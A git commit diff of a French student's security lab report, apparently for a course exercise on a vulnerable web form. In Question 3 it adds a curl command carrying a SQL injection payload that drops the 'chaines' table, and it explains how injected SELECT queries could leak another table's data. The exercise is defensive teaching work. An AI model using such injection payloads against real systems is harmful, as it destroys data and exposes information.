Update rendu.md

4fd943bd · Oualid Hassan · 781b2e4f · 4fd943bd
Commit 4fd943bd authored 3 years ago by Oualid Hassan
--- a/rendu.md
+++ b/rendu.md
@@ -18,15 +18,22 @@ Il n'est pas efficace car la validation est du coté client, il peut modifier la

 ## Question 2

-* curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "chaine=@@@&submit=OK" 172.28.100.33:8080
-
+```bash
+curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "chaine=@@@&submit=OK" 172.28.100.33:8080
+```

 ## Question 3

 * Votre commande curl pour effacer la table

+```bash
+curl 'http://172.28.100.33:8080/' -H 'Content-Type: application/x-www-form-urlencoded' --data-raw 'chaine=test%22%27%2C+%270.0.0.0%27%29%3B+DROP+TABLE+chaines%3B+--&submit=OK'
+```
+
 * Expliquez comment obtenir des informations sur une autre table

+On pourrait injecter une requête SELECT de l'autre table et l'insérer dans la table chaine, ainsi, on pourrait récupérer les résultats sur la page web.
+
 ## Question 4

 Rendre un fichier server_correct.py avec la correction de la faille de